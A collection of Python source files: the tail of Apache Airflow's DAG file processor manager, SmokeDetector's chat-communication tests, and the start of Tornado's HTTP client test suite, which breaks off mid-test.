if file_path in self._file_path_queue:
self._file_path_queue.remove(file_path)
self._file_path_queue.insert(0, file_path)
self.message_buffer[file_path] = (message, process_time)
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
self._file_path_queue.remove(request.full_filepath)
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
if self.remove_non_existent_dag:
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # noqa pylint: disable=broad-except
self.log.exception("Error removing old import errors")
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if self.store_dag_code:
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
if runtime:
Stats.timing(f'dag_processing.last_duration.{file_name}', runtime)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=(last_finish_time - processor.start_time).total_seconds(),
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(self.waitables.keys() - [self._signal_conn], timeout=0)
for sentinel in ready:
if sentinel is self._signal_conn:
continue
processor = cast(AbstractDagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
waiting_queue = []
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# wait until the processor end
if file_path in self._processors:
waiting_queue.append(file_path)
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._processor_factory(
file_path, callback_to_execute_for_file, self._dag_ids, self._pickle_dags
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
waiting_queue.reverse()
for waiting_file_path in waiting_queue:
self._file_path_queue.insert(0, waiting_file_path)
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
files_paths_to_queue = list(
set(self._file_paths)
- set(file_paths_in_progress)
- set(file_paths_recently_processed)
- set(files_paths_at_run_limit)
)
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
if (
not self._last_zombie_query_time
or (now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval
):
# to avoid circular imports
from airflow.jobs.local_task_job import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
DM = airflow.models.DagModel
limit_dttm = timezone.utcnow() - timedelta(seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
zombies = (
session.query(TI, DM.fileloc)
.join(LJ, TI.job_id == LJ.id)
.join(DM, TI.dag_id == DM.dag_id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
)
.all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti, file_loc in zombies:
request = TaskCallbackRequest(
full_filepath=file_loc,
simple_task_instance=SimpleTaskInstance(ti),
msg="Detected as zombie",
)
self.log.info("Detected zombie job: %s", request)
self._add_callback_to_queue(request)
Stats.incr('zombies_killed')
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
self._stop_listen_events()
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
self._stop_listen_events()
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
|
test_chatcommunicate.py
|
import chatcommunicate
import chatcommands
from globalvars import GlobalVars
from datahandling import _remove_pickle
import collections
import io
import os
import os.path
import pytest
import threading
import time
import yaml
from fake import Fake
from unittest.mock import Mock, patch
def test_validate_yaml():
with open("rooms.yml", "r") as f:
room_data = yaml.load(f.read())
with open("users.yml", "r") as f:
user_data = yaml.load(f.read())
flatten = lambda l: [item for sublist in l for item in sublist]
privileged_users = []
for site, site_rooms in room_data.items():
for room_id, room in site_rooms.items():
if "privileges" not in room:
continue
if "additional" in room["privileges"]:
privileged_users.append(room["privileges"]["additional"])
if "inherit" not in room["privileges"]:
privileged_users.append(room["privileges"])
privileged_users = set(flatten(privileged_users))
for uid in privileged_users:
if uid not in user_data:
pytest.fail("Privileged user {} does not have a corresponding entry in users.yml".format(uid))
def test_parse_room_config():
chatcommunicate.parse_room_config("test/test_rooms.yml")
assert ("stackexchange.com", 11540) in chatcommunicate._command_rooms
assert ("stackexchange.com", 30332) in chatcommunicate._command_rooms
assert ("stackoverflow.com", 111347) in chatcommunicate._command_rooms
assert ("stackexchange.com", 3) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._command_rooms
assert ("meta.stackexchange.com", 89) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 11540) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 3) in chatcommunicate._watcher_rooms
assert ("meta.stackexchange.com", 89) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 30332) not in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._watcher_rooms
assert ("stackoverflow.com", 111347) not in chatcommunicate._watcher_rooms
assert chatcommunicate._privileges[("stackexchange.com", 11540)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 30332)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 3)] == set()
assert chatcommunicate._privileges[("stackexchange.com", 54445)] == set()
assert chatcommunicate._privileges[("meta.stackexchange.com", 89)] == {262823}
assert chatcommunicate._privileges[("stackoverflow.com", 111347)] == {3160466, 603346}
assert len(chatcommunicate._room_roles) == 5
assert chatcommunicate._room_roles["debug"] == {("stackexchange.com", 11540)}
assert chatcommunicate._room_roles["all"] == {("stackexchange.com", 11540),
("stackexchange.com", 54445),
("stackoverflow.com", 111347)}
assert chatcommunicate._room_roles["metatavern"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["delay"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["no-all-caps title"] == {("meta.stackexchange.com", 89)}
@patch("chatcommunicate.threading.Thread")
@patch("chatcommunicate.Client")
@patch("chatcommunicate.parse_room_config")
def test_init(room_config, client_constructor, thread):
client = Mock()
client_constructor.return_value = client
client.login.side_effect = Exception()
# https://stackoverflow.com/questions/23337471/
with pytest.raises(Exception) as e:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
assert str(e).endswith("Failed to log into {}, max retries exceeded".format(next(iter(chatcommunicate._clients))))
client.login.side_effect = None
client.login.reset_mock()
client_constructor.reset_mock()
room_config.side_effect = lambda _: room_config.get_original()("test/test_rooms.yml")
GlobalVars.standby_mode = True
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception:
return # This interferes with the following tests
assert len(chatcommunicate._rooms) == 0
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
client.login.reset_mock()
client_constructor.reset_mock()
thread.reset_mock()
GlobalVars.standby_mode = False
counter = 0
def throw_every_other(*_):
nonlocal counter
counter += 1
if counter & 1:
raise Exception()
client.login.side_effect = throw_every_other
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception as e:
return # Because this causes the following checks to fail
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
assert len(chatcommunicate._rooms) == 3
assert chatcommunicate._rooms[("stackexchange.com", 11540)].deletion_watcher is True
assert chatcommunicate._rooms[("stackexchange.com", 30332)].deletion_watcher is False
assert chatcommunicate._rooms[("stackoverflow.com", 111347)].deletion_watcher is False
@pytest.mark.skipif(os.path.isfile("messageData.p"), reason="shouldn't overwrite file")
@patch("chatcommunicate.pickle.dump")
def test_pickle_rick(dump):
try:
threading.Thread(target=chatcommunicate.pickle_last_messages, daemon=True).start()
chatcommunicate._pickle_run.set()
# Yield to the pickling thread until it acquires the lock again
while len(chatcommunicate._pickle_run._cond._waiters) == 0:
time.sleep(0)
assert dump.call_count == 1
call, _ = dump.call_args_list[0]
assert isinstance(call[0], chatcommunicate.LastMessages)
assert isinstance(call[1], io.IOBase) and call[1].name == "messageData.p"
finally:
_remove_pickle("messageData.p")
@patch("chatcommunicate._pickle_run")
def test_message_sender(pickle_rick):
chatcommunicate._last_messages = chatcommunicate.LastMessages({}, collections.OrderedDict())
threading.Thread(target=chatcommunicate.send_messages, daemon=True).start()
room = chatcommunicate.RoomData(Mock(), -1, False)
room.room.id = 11540
room.room._client.host = "stackexchange.com"
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 1}})
chatcommunicate._msg_queue.put((room, "test", None))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 11540, "test"))
room.room.reset_mock()
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
room.room.id = 30332
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 2}})
chatcommunicate._msg_queue.put((room, "test", "did you hear about what happened to pluto"))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 30332, "test"))
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
assert chatcommunicate._last_messages.reports == collections.OrderedDict({("stackexchange.com", 2): "did you hear about what happened to pluto"})
@patch("chatcommunicate._msg_queue.put")
@patch("chatcommunicate.get_last_messages")
def test_on_msg(get_last_messages, post_msg):
client = Fake({
"_br": {
"user_id": 1337
},
"host": "stackexchange.com"
})
room_data = chatcommunicate.RoomData(Mock(), -1, False)
chatcommunicate._rooms[("stackexchange.com", 11540)] = room_data
chatcommunicate.on_msg(Fake({}, spec=chatcommunicate.events.MessageStarred), None) # don't reply to events we don't care about
msg1 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1,
},
"parent": None,
"content": "shoutouts to simpleflips"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg1, client)
msg2 = Fake({
"message": {
"room": {
"id": 11540
},
"owner": {
"id": 1337
},
"id": 999,
"parent": None,
"content": "!!/not_actually_a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg2, client)
msg3 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 999,
"parent": None,
"content": "!!/a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
mock_command = Mock(side_effect=lambda *_, **kwargs: "hi" if not kwargs["quiet_action"] else "")
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 0))
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command-"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 1))
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(None, original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("1 2 3", original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (1, 2))
msg3.message.content = "!!/a_command"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too few arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 oatmeal"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too many arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command- 1 2"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with("1", "2", original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("3", None, original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg4 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 2
}
},
"id": 1000,
"content": "asdf"
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate.on_msg(msg4, client)
msg5 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 1337
}
},
"id": 1000,
"content": "@SmokeDetector why "
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate._reply_commands["why"] = (mock_command, (0, 0))
threw_exception = False
try:
chatcommunicate.on_msg(msg5, client)
except AssertionError:
threw_exception = True
assert threw_exception
mock_command.assert_not_called()
post_msg.assert_not_called()
chatcommunicate._reply_commands["why"] = (mock_command, (1, 1))
chatcommunicate.on_msg(msg5, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 hi"
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg5.message.content = "@SmokeDetector why@!@#-"
chatcommunicate.on_msg(msg5, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=True)
msg6 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 1000,
"parent": None,
"content": "sd why - 2why 2why- 2- why- "
}
}, spec=chatcommunicate.events.MessageEdited)
get_last_messages.side_effect = lambda _, num: (Fake({"id": i}) for i in range(num))
chatcommunicate.on_msg(msg6, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 [:0] hi\n[:1] <skipped>\n[:2] hi\n[:3] hi\n[:4] <processed without return value>\n[:5] <processed without return value>\n[:6] <skipped>\n[:7] <skipped>\n[:8] <processed without return value>"
def test_message_type():
fake1 = Fake({}, spec=chatcommunicate.Message)
assert chatcommands.message(fake1) == fake1
fake2 = Fake({})
threw_exception = False
try:
chatcommands.message(fake2)
except AssertionError:
threw_exception = True
assert threw_exception
|
httpclient_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import base64
import binascii
from contextlib import closing
import copy
import functools
import sys
import threading
import datetime
from io import BytesIO
from tornado.escape import utf8
from tornado import gen
from tornado.httpclient import HTTPRequest, HTTPResponse, _RequestProxy, HTTPError, HTTPClient
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.stack_context import ExceptionStackContext, NullContext
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import unittest, skipOnTravis
from tornado.util import u
from tornado.web import Application, RequestHandler, url
from tornado.httputil import format_timestamp, HTTPHeaders
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish("Post arg1: %s, arg2: %s" % (
self.get_argument("arg1"), self.get_argument("arg2")))
class PutHandler(RequestHandler):
def put(self):
self.write("Put body: ")
self.write(self.request.body)
class RedirectHandler(RequestHandler):
def prepare(self):
self.write('redirects can have bodies too')
self.redirect(self.get_argument("url"),
status=int(self.get_argument("status", "302")))
class ChunkHandler(RequestHandler):
@gen.coroutine
def get(self):
self.write("asdf")
self.flush()
# Wait a bit to ensure the chunks are sent and received separately.
yield gen.sleep(0.01)
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get('User-Agent', 'User agent not set'))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header('Content-Length', 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class PatchHandler(RequestHandler):
def patch(self):
"Return the request payload - so we can check it is being kept"
self.write(self.request.body)
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ('OTHER',)
def method(self):
self.write(self.request.method)
get = post = put = delete = options = patch = other = method
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/put", PutHandler),
url("/redirect", RedirectHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
url("/all_methods", AllMethodsHandler),
url('/patch', PatchHandler),
], gzip=True)
def test_patch_receives_payload(self):
body = b"some patch data"
response = self.fetch("/patch", method='PATCH', body=body)
self.assertEqual(response.code, 200)
self.assertEqual(response.body, body)
@skipOnTravis
def test_hello_world(self):
response = self.fetch("/hello")
self.assertEqual(response.code, 200)
self.assertEqual(response.headers["Content-Type"], "text/plain")
self.assertEqual(response.body, b"Hello world!")
self.assertEqual(int(response.request_time), 0)
response = self.fetch("/hello?name=Ben")
self.assertEqual(response.body, b"Hello Ben!")
def test_streaming_callback(self):
# streaming_callback is also tested in test_chunked
chunks = []
response = self.fetch("/hello",
streaming_callback=chunks.append)
# with streaming_callback, data goes to the callback and not response.body
self.assertEqual(chunks, [b"Hello world!"])
self.assertFalse(response.body)
def test_post(self):
response = self.fetch("/post", method="POST",
body="arg1=foo&arg2=bar")
self.assertEqual(response.code, 200)
self.assertEqual(response.body, b"Post arg1: foo, arg2: bar")
def test_chunked(self):
response = self.fetch("/chunk")
self.assertEqual(response.body, b"asdfqwer")
chunks = []
response = self.fetch("/chunk",
streaming_callback=chunks.append)
self.assertEqual(chunks, [b"asdf", b"qwer"])
self.assertFalse(response.body)
def test_chunked_close(self):
# test case in which chunks spread read-callback processing
# over several ioloop iterations, but the connection is already closed.
sock, port = bind_unused_port()
with closing(sock):
def write_response(stream, request_data):
if b"HTTP/1." not in request_data:
self.skipTest("requires HTTP/1.x")
stream.write(b"""\
HTTP/1.1 200 OK
Transfer-Encoding: chunked
1
1
1
2
0
""".replace(b"\n", b"\r\n"), callback=stream.close)
def accept_callback(conn, address):
# fake an HTTP server using chunked encoding where the final chunks
# and connection close all happen at once
stream = IOStream(conn, io_loop=self.io_loop)
stream.read_until(b"\r\n\r\n",
functools.partial(write_response, stream))
netutil.add_accept_handler(sock, accept_callback, self.io_loop)
self.http_client.fetch("http://127.0.0.1:%d/" % port, self.stop)
resp = self.wait()
resp.rethrow()
self.assertEqual(resp.body, b"12")
self.io_loop.remove_handler(sock.fileno())
def test_streaming_stack_context(self):
chunks = []
exc_info = []
def error_handler(typ, value, tb):
exc_info.append((typ, value, tb))
return True
def streaming_cb(chunk):
chunks.append(chunk)
if chunk == b'qwer':
1 / 0
with ExceptionStackContext(error_handler):
self.fetch('/chunk', streaming_callback=streaming_cb)
self.assertEqual(chunks, [b'asdf', b'qwer'])
self.assertEqual(1, len(exc_info))
self.assertIs(exc_info[0][0], ZeroDivisionError)
def test_basic_auth(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_basic_auth_explicit_mode(self):
self.assertEqual(self.fetch("/auth", auth_username="Aladdin",
auth_password="open sesame",
auth_mode="basic").body,
b"Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==")
def test_unsupported_auth_mode(self):
# curl and simple clients handle errors a bit differently; the
# important thing is that they don't fall back to basic auth
# on an unknown mode.
with ExpectLog(gen_log, "uncaught exception", required=False):
